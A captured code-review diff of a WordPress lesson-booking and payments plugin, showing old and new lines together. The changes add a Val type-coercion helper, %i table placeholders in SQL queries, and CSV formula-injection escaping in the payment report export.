public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
slotId: (int) $row->slot_id,
studentId: (int) $row->student_id,
instructorId: (int) $row->instructor_id,
offeringId: null !== $row->offering_id ? (int) $row->offering_id : null,
recurrence: $row->recurrence,
seriesId: null !== $row->series_id ? (int) $row->series_id : null,
status: $row->status,
paymentId: null !== $row->payment_id ? (int) $row->payment_id : null,
notes: $row->notes,
id: (int) $row->id,
slotId: Val::int( $row->slot_id ),
studentId: Val::int( $row->student_id ),
instructorId: Val::int( $row->instructor_id ),
offeringId: Val::intOrNull( $row->offering_id ),
recurrence: Val::string( $row->recurrence ),
seriesId: Val::intOrNull( $row->series_id ),
status: Val::string( $row->status ),
paymentId: Val::intOrNull( $row->payment_id ),
notes: Val::stringOrNull( $row->notes ),
id: Val::int( $row->id ),
);
}
src/Booking/LessonController.php
+6 -4
View File
@@ -6,6 +6,7 @@ namespace Unsupervised\Schedular\Booking;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Payment\Payment;
use Unsupervised\Schedular\Payment\PaymentRepository;
use Unsupervised\Schedular\Val;
class LessonController {
@@ -48,10 +49,11 @@ class LessonController {
}
// phpcs:disable WordPress.Security.NonceVerification.Missing -- nonce checked above.
$action = sanitize_key( wp_unslash( $_POST['usc_action'] ?? '' ) );
$paymentId = absint( $_POST['payment_id'] ?? 0 );
$email = sanitize_email( wp_unslash( $_POST['etransfer_email'] ?? '' ) );
$taxRate = isset( $_POST['tax_rate'] ) ? max( 0.0, (float) $_POST['tax_rate'] ) : 0.0;
$action = sanitize_key( Val::string( wp_unslash( $_POST['usc_action'] ) ) );
$paymentId = absint( Val::int( $_POST['payment_id'] ?? 0 ) );
$email = sanitize_email( Val::string( wp_unslash( $_POST['etransfer_email'] ?? '' ) ) );
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- Val::float() coerces to float; slashes cannot survive numeric coercion.
$taxRate = isset( $_POST['tax_rate'] ) ? max( 0.0, Val::float( $_POST['tax_rate'] ) ) : 0.0;
// phpcs:enable WordPress.Security.NonceVerification.Missing
if ( $paymentId <= 0 || ! in_array( $action, [ 'set_etransfer', 'set_tax' ], true ) ) {
src/GroupClass/Enrollment.php
+9 -7
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\GroupClass;
use Unsupervised\Schedular\Val;
class Enrollment {
public const STATUS_ACTIVE = 'active';
@@ -25,14 +27,14 @@ class Enrollment {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
offeringId: (int) $row->offering_id,
studentId: (int) $row->student_id,
instructorId: (int) $row->instructor_id,
status: $row->status,
paymentId: null !== $row->payment_id ? (int) $row->payment_id : null,
id: (int) $row->id,
offeringId: Val::int( $row->offering_id ),
studentId: Val::int( $row->student_id ),
instructorId: Val::int( $row->instructor_id ),
status: Val::string( $row->status ),
paymentId: Val::intOrNull( $row->payment_id ),
id: Val::int( $row->id ),
);
}
src/GroupClass/EnrollmentEndpoint.php
+10 -4
View File
@@ -10,6 +10,7 @@ use Unsupervised\Schedular\Payment\Payment;
use Unsupervised\Schedular\Payment\PaymentService;
use Unsupervised\Schedular\Policy\PolicyAcceptance;
use Unsupervised\Schedular\Registration\RegistrationGate;
use Unsupervised\Schedular\Val;
class EnrollmentEndpoint {
@@ -20,6 +21,11 @@ class EnrollmentEndpoint {
private PaymentService $payments,
) {}
/**
* Registers this endpoint's REST routes.
*
* @param non-falsy-string $route_namespace REST namespace the routes are registered under (e.g. `us-scheduler/v1`).
*/
public function registerRoutes( string $route_namespace ): void {
register_rest_route(
$route_namespace,
@@ -69,7 +75,7 @@ class EnrollmentEndpoint {
}
public function enroll( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$offeringId = absint( $request->get_param( 'offering_id' ) );
$offeringId = absint( Val::int( $request->get_param( 'offering_id' ) ) );
$offering = $this->offerings->findById( $offeringId );
if ( null === $offering || Offering::KIND_GROUP_CLASS !== $offering->kind ) {
@@ -87,7 +93,7 @@ class EnrollmentEndpoint {
}
$answers = $this->answers( $request );
$acceptedVersionIds = array_map( 'absint', (array) $request->get_param( 'accepted_policy_version_ids' ) );
$acceptedVersionIds = array_values( array_map( static fn( mixed $v ): int => absint( Val::int( $v ) ), (array) $request->get_param( 'accepted_policy_version_ids' ) ) );
$gateError = $this->gate->validate( $offeringId, $answers, $acceptedVersionIds );
if ( $gateError instanceof \WP_Error ) {
@@ -133,7 +139,7 @@ class EnrollmentEndpoint {
private function answers( \WP_REST_Request $request ): array {
$out = [];
foreach ( (array) $request->get_param( 'answers' ) as $questionId => $value ) {
$out[ (int) $questionId ] = sanitize_text_field( (string) $value );
$out[ (int) $questionId ] = sanitize_text_field( Val::string( $value ) );
}
return $out;
@@ -141,7 +147,7 @@ class EnrollmentEndpoint {
private function clientIp(): ?string {
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.ValidatedSanitizedInput.MissingUnslash -- IP stored verbatim for audit.
$ip = sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ?? '' ) );
$ip = sanitize_text_field( Val::string( wp_unslash( $_SERVER['REMOTE_ADDR'] ?? '' ) ) );
return '' !== $ip ? $ip : null;
}
src/GroupClass/EnrollmentRepository.php
+13 -7
View File
@@ -30,7 +30,7 @@ class EnrollmentRepository {
public function findById( int $id ): ?Enrollment {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? Enrollment::fromRow( $row ) : null;
@@ -42,7 +42,8 @@ class EnrollmentRepository {
public function countActiveForOffering( int $offeringId ): int {
return (int) $this->db->get_var(
$this->db->prepare(
"SELECT COUNT(*) FROM {$this->table} WHERE offering_id = %d AND status = %s",
'SELECT COUNT(*) FROM %i WHERE offering_id = %d AND status = %s',
$this->table,
$offeringId,
Enrollment::STATUS_ACTIVE
)
@@ -55,7 +56,8 @@ class EnrollmentRepository {
public function countActiveForStudent( int $studentId ): int {
return (int) $this->db->get_var(
$this->db->prepare(
"SELECT COUNT(*) FROM {$this->table} WHERE student_id = %d AND status = %s",
'SELECT COUNT(*) FROM %i WHERE student_id = %d AND status = %s',
$this->table,
$studentId,
Enrollment::STATUS_ACTIVE
)
@@ -68,7 +70,8 @@ class EnrollmentRepository {
public function hasActiveEnrollment( int $offeringId, int $studentId ): bool {
$count = (int) $this->db->get_var(
$this->db->prepare(
"SELECT COUNT(*) FROM {$this->table} WHERE offering_id = %d AND student_id = %d AND status = %s",
'SELECT COUNT(*) FROM %i WHERE offering_id = %d AND student_id = %d AND status = %s',
$this->table,
$offeringId,
$studentId,
Enrollment::STATUS_ACTIVE
@@ -86,7 +89,8 @@ class EnrollmentRepository {
public function findByStudent( int $studentId ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE student_id = %d ORDER BY enrolled_at DESC",
'SELECT * FROM %i WHERE student_id = %d ORDER BY enrolled_at DESC',
$this->table,
$studentId
)
);
@@ -102,7 +106,8 @@ class EnrollmentRepository {
public function findByInstructor( int $instructorId ): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE instructor_id = %d ORDER BY enrolled_at DESC",
'SELECT * FROM %i WHERE instructor_id = %d ORDER BY enrolled_at DESC',
$this->table,
$instructorId
)
);
@@ -118,7 +123,8 @@ class EnrollmentRepository {
public function findAllActive(): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE status = %s ORDER BY enrolled_at DESC",
'SELECT * FROM %i WHERE status = %s ORDER BY enrolled_at DESC',
$this->table,
Enrollment::STATUS_ACTIVE
)
);
src/GroupClass/GroupClassPage.php
+4 -2
View File
@@ -10,14 +10,16 @@ class GroupClassPage {
/**
* Renders the group-class enrolment shortcode output.
*
* @param array<string, string> $atts Shortcode attributes (unused — reserved for future options).
* @param array<string> $atts Shortcode attributes (unused — reserved for future options).
*/
public function render( array $atts ): string { // phpcs:ignore Generic.CodeAnalysis.UnusedFunctionParameter.Found
if ( ! is_user_logged_in() ) {
$permalink = get_permalink();
return sprintf(
'<p>%s <a href="%s">%s</a>.</p>',
esc_html__( 'Please', 'unsupervised-schedular' ),
esc_url( wp_login_url( get_permalink() ) ),
esc_url( wp_login_url( false === $permalink ? '' : $permalink ) ),
esc_html__( 'log in to enrol in a class', 'unsupervised-schedular' )
);
}
src/Installer.php
+3
View File
@@ -16,6 +16,9 @@ class Installer {
private function createTables(): void {
global $wpdb;
if ( ! $wpdb instanceof \wpdb ) {
return;
}
$charset = $wpdb->get_charset_collate();
require_once ABSPATH . 'wp-admin/includes/upgrade.php';
src/Offering/Offering.php
+19 -17
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Offering;
use Unsupervised\Schedular\Val;
class Offering {
public const KIND_PRIVATE_LESSON = 'private_lesson';
@@ -44,24 +46,24 @@ class Offering {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
instructorId: (int) $row->instructor_id,
kind: $row->kind,
title: $row->title,
price: (float) $row->price,
currency: $row->currency,
billingMode: $row->billing_mode,
description: $row->description,
durationMinutes: null !== $row->duration_minutes ? (int) $row->duration_minutes : null,
allowWeekly: (bool) $row->allow_weekly,
capacity: null !== $row->capacity ? (int) $row->capacity : null,
termStart: $row->term_start,
termEnd: $row->term_end,
scheduleNote: $row->schedule_note,
etransferEmail: $row->etransfer_email,
isActive: (bool) $row->is_active,
id: (int) $row->id,
instructorId: Val::int( $row->instructor_id ),
kind: Val::string( $row->kind ),
title: Val::string( $row->title ),
price: Val::float( $row->price ),
currency: Val::string( $row->currency ),
billingMode: Val::string( $row->billing_mode ),
description: Val::stringOrNull( $row->description ),
durationMinutes: Val::intOrNull( $row->duration_minutes ),
allowWeekly: Val::bool( $row->allow_weekly ),
capacity: Val::intOrNull( $row->capacity ),
termStart: Val::stringOrNull( $row->term_start ),
termEnd: Val::stringOrNull( $row->term_end ),
scheduleNote: Val::stringOrNull( $row->schedule_note ),
etransferEmail: Val::stringOrNull( $row->etransfer_email ),
isActive: Val::bool( $row->is_active ),
id: Val::int( $row->id ),
);
}
src/Offering/OfferingController.php
+11 -10
View File
@@ -4,6 +4,7 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Offering;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Val;
class OfferingController {
@@ -31,14 +32,14 @@ class OfferingController {
private function handleFormAction( int $instructorId, bool $manageAll ): void {
// Nonce is verified by the caller (renderPage) before this method runs.
// phpcs:disable WordPress.Security.NonceVerification.Missing
$action = sanitize_key( wp_unslash( $_POST['usc_action'] ?? '' ) );
$action = sanitize_key( Val::string( wp_unslash( $_POST['usc_action'] ?? '' ) ) );
if ( 'add' === $action ) {
$this->addOffering( $instructorId );
}
if ( 'delete' === $action ) {
$offeringId = absint( $_POST['offering_id'] ?? 0 );
$offeringId = absint( Val::int( $_POST['offering_id'] ?? 0 ) );
if ( $offeringId > 0 ) {
$offering = $this->repository->findById( $offeringId );
if ( $offering && ( $manageAll || $offering->instructorId === $instructorId ) ) {
@@ -51,33 +52,33 @@ class OfferingController {
private function addOffering( int $instructorId ): void {
// phpcs:disable WordPress.Security.NonceVerification.Missing
$title = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
$kind = sanitize_key( wp_unslash( $_POST['kind'] ?? '' ) );
$title = sanitize_text_field( Val::string( wp_unslash( $_POST['title'] ?? '' ) ) );
$kind = sanitize_key( Val::string( wp_unslash( $_POST['kind'] ?? '' ) ) );
if ( '' === $title || ! in_array( $kind, Offering::VALID_KINDS, true ) ) {
return;
}
$billingMode = sanitize_key( wp_unslash( $_POST['billing_mode'] ?? Offering::BILLING_ONE_TIME ) );
$billingMode = sanitize_key( Val::string( wp_unslash( $_POST['billing_mode'] ?? Offering::BILLING_ONE_TIME ) ) );
if ( ! in_array( $billingMode, Offering::VALID_BILLING_MODES, true ) ) {
$billingMode = Offering::BILLING_ONE_TIME;
}
$duration = absint( $_POST['duration_minutes'] ?? 0 );
$capacity = absint( $_POST['capacity'] ?? 0 );
$duration = absint( Val::int( $_POST['duration_minutes'] ?? 0 ) );
$capacity = absint( Val::int( $_POST['capacity'] ?? 0 ) );
$this->repository->insert(
new Offering(
instructorId: $instructorId,
kind: $kind,
title: $title,
price: max( 0.0, (float) sanitize_text_field( wp_unslash( $_POST['price'] ?? '0' ) ) ),
price: max( 0.0, (float) sanitize_text_field( Val::string( wp_unslash( $_POST['price'] ?? '0' ) ) ) ),
billingMode: $billingMode,
durationMinutes: $duration > 0 ? $duration : null,
allowWeekly: isset( $_POST['allow_weekly'] ),
capacity: $capacity > 0 ? $capacity : null,
scheduleNote: $this->nullableText( sanitize_text_field( wp_unslash( $_POST['schedule_note'] ?? '' ) ) ),
etransferEmail: $this->nullableText( sanitize_email( wp_unslash( $_POST['etransfer_email'] ?? '' ) ) ),
scheduleNote: $this->nullableText( sanitize_text_field( Val::string( wp_unslash( $_POST['schedule_note'] ?? '' ) ) ) ),
etransferEmail: $this->nullableText( sanitize_email( Val::string( wp_unslash( $_POST['etransfer_email'] ?? '' ) ) ) ),
)
);
// phpcs:enable WordPress.Security.NonceVerification.Missing
src/Offering/OfferingEndpoint.php
+22 -16
View File
@@ -4,11 +4,17 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Offering;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Val;
class OfferingEndpoint {
public function __construct( private OfferingRepository $repository ) {}
/**
* Registers this endpoint's REST routes.
*
* @param non-falsy-string $route_namespace REST namespace the routes are registered under (e.g. `us-scheduler/v1`).
*/
public function registerRoutes( string $route_namespace ): void {
register_rest_route(
$route_namespace,
@@ -57,8 +63,8 @@ class OfferingEndpoint {
public function index( \WP_REST_Request $request ): \WP_REST_Response {
$offerings = $this->repository->findAll(
(int) $request->get_param( 'instructor_id' ),
(string) $request->get_param( 'kind' ),
Val::int( $request->get_param( 'instructor_id' ) ),
Val::string( $request->get_param( 'kind' ) ),
activeOnly: true,
);
@@ -67,17 +73,17 @@ class OfferingEndpoint {
}
public function create( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$title = sanitize_text_field( (string) $request->get_param( 'title' ) );
$title = sanitize_text_field( Val::string( $request->get_param( 'title' ) ) );
if ( '' === $title ) {
return $this->invalid( __( 'A title is required.', 'unsupervised-schedular' ) );
}
$kind = (string) $request->get_param( 'kind' );
$kind = Val::string( $request->get_param( 'kind' ) );
if ( ! in_array( $kind, Offering::VALID_KINDS, true ) ) {
return $this->invalid( __( 'Invalid offering kind.', 'unsupervised-schedular' ) );
}
$billingMode = (string) ( $request->get_param( 'billing_mode' ) ?? Offering::BILLING_ONE_TIME );
$billingMode = Val::string( $request->get_param( 'billing_mode' ) ?? Offering::BILLING_ONE_TIME );
if ( ! in_array( $billingMode, Offering::VALID_BILLING_MODES, true ) ) {
return $this->invalid( __( 'Invalid billing mode.', 'unsupervised-schedular' ) );
}
@@ -87,7 +93,7 @@ class OfferingEndpoint {
kind: $kind,
title: $title,
price: $this->price( $request->get_param( 'price' ) ),
currency: sanitize_text_field( (string) ( $request->get_param( 'currency' ) ?? 'CAD' ) ),
currency: sanitize_text_field( Val::string( $request->get_param( 'currency' ) ?? 'CAD' ) ),
billingMode: $billingMode,
description: $this->nullableText( $request->get_param( 'description' ) ),
durationMinutes: $this->nullableInt( $request->get_param( 'duration_minutes' ) ),
@@ -106,7 +112,7 @@ class OfferingEndpoint {
}
public function update( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$id = absint( $request->get_param( 'id' ) );
$id = absint( Val::int( $request->get_param( 'id' ) ) );
$existing = $this->repository->findById( $id );
if ( null === $existing ) {
@@ -117,12 +123,12 @@ class OfferingEndpoint {
return new \WP_Error( 'forbidden', __( 'You cannot edit this offering.', 'unsupervised-schedular' ), [ 'status' => 403 ] );
}
$kind = $request->has_param( 'kind' ) ? (string) $request->get_param( 'kind' ) : $existing->kind;
$kind = $request->has_param( 'kind' ) ? Val::string( $request->get_param( 'kind' ) ) : $existing->kind;
if ( ! in_array( $kind, Offering::VALID_KINDS, true ) ) {
return $this->invalid( __( 'Invalid offering kind.', 'unsupervised-schedular' ) );
}
$billingMode = $request->has_param( 'billing_mode' ) ? (string) $request->get_param( 'billing_mode' ) : $existing->billingMode;
$billingMode = $request->has_param( 'billing_mode' ) ? Val::string( $request->get_param( 'billing_mode' ) ) : $existing->billingMode;
if ( ! in_array( $billingMode, Offering::VALID_BILLING_MODES, true ) ) {
return $this->invalid( __( 'Invalid billing mode.', 'unsupervised-schedular' ) );
}
@@ -130,9 +136,9 @@ class OfferingEndpoint {
$offering = new Offering(
instructorId: $existing->instructorId,
kind: $kind,
title: $request->has_param( 'title' ) ? sanitize_text_field( (string) $request->get_param( 'title' ) ) : $existing->title,
title: $request->has_param( 'title' ) ? sanitize_text_field( Val::string( $request->get_param( 'title' ) ) ) : $existing->title,
price: $request->has_param( 'price' ) ? $this->price( $request->get_param( 'price' ) ) : $existing->price,
currency: $request->has_param( 'currency' ) ? sanitize_text_field( (string) $request->get_param( 'currency' ) ) : $existing->currency,
currency: $request->has_param( 'currency' ) ? sanitize_text_field( Val::string( $request->get_param( 'currency' ) ) ) : $existing->currency,
billingMode: $billingMode,
description: $request->has_param( 'description' ) ? $this->nullableText( $request->get_param( 'description' ) ) : $existing->description,
durationMinutes: $request->has_param( 'duration_minutes' ) ? $this->nullableInt( $request->get_param( 'duration_minutes' ) ) : $existing->durationMinutes,
@@ -152,7 +158,7 @@ class OfferingEndpoint {
}
public function delete( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$id = absint( $request->get_param( 'id' ) );
$id = absint( Val::int( $request->get_param( 'id' ) ) );
$existing = $this->repository->findById( $id );
if ( null === $existing ) {
@@ -195,17 +201,17 @@ class OfferingEndpoint {
}
private function price( mixed $value ): float {
return max( 0.0, (float) $value );
return max( 0.0, Val::float( $value ) );
}
private function nullableEmail( mixed $value ): ?string {
$email = sanitize_email( (string) $value );
$email = sanitize_email( Val::string( $value ) );
return '' !== $email ? $email : null;
}
private function nullableInt( mixed $value ): ?int {
return ( null === $value || '' === $value ) ? null : (int) $value;
return ( null === $value || '' === $value ) ? null : Val::int( $value );
}
private function nullableText( mixed $value ): ?string {
@@ -213,6 +219,6 @@ class OfferingEndpoint {
return null;
}
return sanitize_text_field( (string) $value );
return sanitize_text_field( Val::string( $value ) );
}
}
src/Offering/OfferingRepository.php
+5 -5
View File
@@ -90,18 +90,18 @@ class OfferingRepository {
}
$whereClause = implode( ' AND ', $where );
$sql = "SELECT * FROM {$this->table} WHERE {$whereClause} ORDER BY title ASC";
$sql = "SELECT * FROM %i WHERE {$whereClause} ORDER BY title ASC";
$rows = $params
? $this->db->get_results( $this->db->prepare( $sql, $params ) )
: $this->db->get_results( $sql );
$rows = $this->db->get_results(
$this->db->prepare( $sql, array_merge( [ $this->table ], $params ) )
);
return array_map( Offering::fromRow( ... ), $rows ?? [] );
}
public function findById( int $id ): ?Offering {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? Offering::fromRow( $row ) : null;
src/Payment/BillingMethodResolver.php
+3 -1
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Payment;
use Unsupervised\Schedular\Val;
/**
* Resolves the billing method for a student: a per-student override if set,
* otherwise the studio default — card when Stripe is configured, e-transfer when
@@ -15,7 +17,7 @@ class BillingMethodResolver {
public function __construct( private StudioSettings $settings ) {}
public function resolve( int $studentId ): string {
$override = (string) get_user_meta( $studentId, self::META_METHOD, true );
$override = Val::string( get_user_meta( $studentId, self::META_METHOD, true ) );
if ( in_array( $override, Payment::VALID_METHODS, true ) ) {
return $override;
}
src/Payment/Payment.php
+19 -17
View File
@@ -3,6 +3,8 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Payment;
use Unsupervised\Schedular\Val;
class Payment {
public const METHOD_CARD = 'card';
@@ -50,24 +52,24 @@ class Payment {
public readonly ?int $id = null,
) {}
public static function fromRow( object $row ): self {
public static function fromRow( \stdClass $row ): self {
return new self(
studentId: (int) $row->student_id,
instructorId: (int) $row->instructor_id,
registrationType: $row->registration_type,
registrationId: (int) $row->registration_id,
amount: (float) $row->amount,
currency: $row->currency,
method: $row->method,
status: $row->status,
taxRate: (float) $row->tax_rate,
taxAmount: (float) $row->tax_amount,
etransferEmail: $row->etransfer_email,
stripePaymentIntentId: $row->stripe_payment_intent_id,
receiptNumber: $row->receipt_number,
receiptSentAt: $row->receipt_sent_at,
paidAt: $row->paid_at,
id: (int) $row->id,
studentId: Val::int( $row->student_id ),
instructorId: Val::int( $row->instructor_id ),
registrationType: Val::string( $row->registration_type ),
registrationId: Val::int( $row->registration_id ),
amount: Val::float( $row->amount ),
currency: Val::string( $row->currency ),
method: Val::string( $row->method ),
status: Val::string( $row->status ),
taxRate: Val::float( $row->tax_rate ),
taxAmount: Val::float( $row->tax_amount ),
etransferEmail: Val::stringOrNull( $row->etransfer_email ),
stripePaymentIntentId: Val::stringOrNull( $row->stripe_payment_intent_id ),
receiptNumber: Val::stringOrNull( $row->receipt_number ),
receiptSentAt: Val::stringOrNull( $row->receipt_sent_at ),
paidAt: Val::stringOrNull( $row->paid_at ),
id: Val::int( $row->id ),
);
}
src/Payment/PaymentController.php
+4 -3
View File
@@ -4,6 +4,7 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Payment;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Val;
class PaymentController {
@@ -19,10 +20,10 @@ class PaymentController {
if ( isset( $_POST['usc_action'] ) && check_admin_referer( 'usc_payment_action' ) ) {
// phpcs:ignore WordPress.Security.NonceVerification.Missing -- nonce checked above.
if ( 'mark_paid' === sanitize_key( wp_unslash( $_POST['usc_action'] ?? '' ) ) ) {
if ( 'mark_paid' === sanitize_key( Val::string( wp_unslash( $_POST['usc_action'] ) ) ) ) {
// phpcs:disable WordPress.Security.NonceVerification.Missing
$paymentId = absint( $_POST['payment_id'] ?? 0 );
$email = sanitize_email( wp_unslash( $_POST['etransfer_email'] ?? '' ) );
$paymentId = absint( Val::int( $_POST['payment_id'] ?? 0 ) );
$email = sanitize_email( Val::string( wp_unslash( $_POST['etransfer_email'] ?? '' ) ) );
// phpcs:enable WordPress.Security.NonceVerification.Missing
if ( $paymentId > 0 ) {
// Record the destination it was actually sent to before confirming.
src/Payment/PaymentEndpoint.php
+9 -3
View File
@@ -4,11 +4,17 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Payment;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Val;
class PaymentEndpoint {
public function __construct( private PaymentService $service ) {}
/**
* Registers this endpoint's REST routes.
*
* @param non-falsy-string $route_namespace REST namespace the routes are registered under (e.g. `us-scheduler/v1`).
*/
public function registerRoutes( string $route_namespace ): void {
register_rest_route(
$route_namespace,
@@ -64,8 +70,8 @@ class PaymentEndpoint {
* (Stripe client secret for card; display data for e-transfer/comp).
*/
public function createIntent( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$type = (string) $request->get_param( 'registration_type' );
$registrationId = absint( $request->get_param( 'registration_id' ) );
$type = Val::string( $request->get_param( 'registration_type' ) );
$registrationId = absint( Val::int( $request->get_param( 'registration_id' ) ) );
$result = $this->service->createIntent( $type, $registrationId, get_current_user_id() );
if ( null === $result ) {
@@ -99,7 +105,7 @@ class PaymentEndpoint {
* Studio admin marks a pending payment (e-transfer) received.
*/
public function markPaid( \WP_REST_Request $request ): \WP_REST_Response|\WP_Error {
$id = absint( $request->get_param( 'id' ) );
$id = absint( Val::int( $request->get_param( 'id' ) ) );
if ( ! $this->service->markPaid( $id ) ) {
return new \WP_Error( 'not_found', __( 'Payment not found.', 'unsupervised-schedular' ), [ 'status' => 404 ] );
src/Payment/PaymentReport.php
+11 -2
View File
@@ -90,13 +90,22 @@ class PaymentReport {
}
/**
* Format one CSV record, quoting fields and escaping embedded quotes.
* Format one CSV record, quoting fields and escaping embedded quotes. Fields
* that a spreadsheet would interpret as a formula (leading =, +, -, @, tab, or
* CR — e.g. a hostile student display name) are prefixed with an apostrophe so
* they open as text, never as executable formulas.
*
* @param list<string> $fields
*/
private function csvLine( array $fields ): string {
$escaped = array_map(
static fn( string $field ): string => '"' . str_replace( '"', '""', $field ) . '"',
static function ( string $field ): string {
if ( 1 === preg_match( '/^[=+\-@\t\r]/', $field ) ) {
$field = "'" . $field;
}
return '"' . str_replace( '"', '""', $field ) . '"';
},
$fields
);
src/Payment/PaymentReportController.php
+7 -5
View File
@@ -4,6 +4,7 @@ declare(strict_types=1);
namespace Unsupervised\Schedular\Payment;
use Unsupervised\Schedular\Auth\RoleManager;
use Unsupervised\Schedular\Val;
class PaymentReportController {
@@ -21,8 +22,8 @@ class PaymentReportController {
}
// phpcs:disable WordPress.Security.NonceVerification.Recommended -- read-only report filters, no state change.
$month = $this->sanitizeMonth( isset( $_GET['month'] ) ? sanitize_text_field( wp_unslash( $_GET['month'] ) ) : '' );
$instructorId = isset( $_GET['instructor_id'] ) ? absint( $_GET['instructor_id'] ) : 0;
$month = $this->sanitizeMonth( isset( $_GET['month'] ) ? sanitize_text_field( Val::string( wp_unslash( $_GET['month'] ) ) ) : '' );
$instructorId = isset( $_GET['instructor_id'] ) ? absint( Val::int( $_GET['instructor_id'] ) ) : 0;
// phpcs:enable WordPress.Security.NonceVerification.Recommended
$instructorId = $this->scopeInstructor( $instructorId );
@@ -58,8 +59,8 @@ class PaymentReportController {
check_admin_referer( self::EXPORT_ACTION );
// phpcs:disable WordPress.Security.NonceVerification.Recommended -- nonce checked above.
$month = $this->sanitizeMonth( isset( $_GET['month'] ) ? sanitize_text_field( wp_unslash( $_GET['month'] ) ) : '' );
$instructorId = isset( $_GET['instructor_id'] ) ? absint( $_GET['instructor_id'] ) : 0;
$month = $this->sanitizeMonth( isset( $_GET['month'] ) ? sanitize_text_field( Val::string( wp_unslash( $_GET['month'] ) ) ) : '' );
$instructorId = isset( $_GET['instructor_id'] ) ? absint( Val::int( $_GET['instructor_id'] ) ) : 0;
// phpcs:enable WordPress.Security.NonceVerification.Recommended
$instructorId = $this->scopeInstructor( $instructorId );
@@ -92,7 +93,8 @@ class PaymentReportController {
*/
private function buildReport( string $month, int $instructorId ): PaymentReport {
$start = $month . '-01 00:00:00';
$end = gmdate( 'Y-m-d H:i:s', strtotime( $month . '-01 00:00:00 +1 month' ) );
$endTs = strtotime( $month . '-01 00:00:00 +1 month' );
$end = false === $endTs ? $start : gmdate( 'Y-m-d H:i:s', $endTs );
$rows = array_map(
static function ( Payment $payment ): array {
src/Payment/PaymentRepository.php
+14 -10
View File
@@ -55,7 +55,8 @@ class PaymentRepository {
public function findByStripeIntentId( string $intentId ): ?Payment {
$row = $this->db->get_row(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE stripe_payment_intent_id = %s ORDER BY id DESC LIMIT 1",
'SELECT * FROM %i WHERE stripe_payment_intent_id = %s ORDER BY id DESC LIMIT 1',
$this->table,
$intentId
)
);
@@ -77,14 +78,15 @@ class PaymentRepository {
* Set a payment's tax rate and recompute the tax amount from its subtotal.
*/
public function updateTax( int $id, float $rate ): bool {
return false !== $this->db->query(
$this->db->prepare(
"UPDATE {$this->table} SET tax_rate = %f, tax_amount = ROUND( amount * %f / 100, 2 ) WHERE id = %d",
$sql = $this->db->prepare(
'UPDATE %i SET tax_rate = %f, tax_amount = ROUND( amount * %f / 100, 2 ) WHERE id = %d',
$this->table,
$rate,
$rate,
$id
)
);
return null !== $sql && false !== $this->db->query( $sql );
}
/**
@@ -94,8 +96,8 @@ class PaymentRepository {
* @return list<Payment>
*/
public function findPaidBetween( string $from, string $to, int $instructorId = 0 ): array {
$sql = "SELECT * FROM {$this->table} WHERE status = %s AND paid_at >= %s AND paid_at < %s";
$params = [ Payment::STATUS_PAID, $from, $to ];
$sql = 'SELECT * FROM %i WHERE status = %s AND paid_at >= %s AND paid_at < %s';
$params = [ $this->table, Payment::STATUS_PAID, $from, $to ];
if ( $instructorId > 0 ) {
$sql .= ' AND instructor_id = %d';
@@ -111,7 +113,7 @@ class PaymentRepository {
public function findById( int $id ): ?Payment {
$row = $this->db->get_row(
$this->db->prepare( "SELECT * FROM {$this->table} WHERE id = %d", $id )
$this->db->prepare( 'SELECT * FROM %i WHERE id = %d', $this->table, $id )
);
return $row ? Payment::fromRow( $row ) : null;
@@ -120,7 +122,8 @@ class PaymentRepository {
public function findByRegistration( string $registrationType, int $registrationId ): ?Payment {
$row = $this->db->get_row(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE registration_type = %s AND registration_id = %d ORDER BY id DESC LIMIT 1",
'SELECT * FROM %i WHERE registration_type = %s AND registration_id = %d ORDER BY id DESC LIMIT 1',
$this->table,
$registrationType,
$registrationId
)
@@ -137,7 +140,8 @@ class PaymentRepository {
public function findPending(): array {
$rows = $this->db->get_results(
$this->db->prepare(
"SELECT * FROM {$this->table} WHERE status = %s ORDER BY created_at DESC",
'SELECT * FROM %i WHERE status = %s ORDER BY created_at DESC',
$this->table,
Payment::STATUS_PENDING
)
);
src/Payment/StripeGateway.php
+2 -2
View File
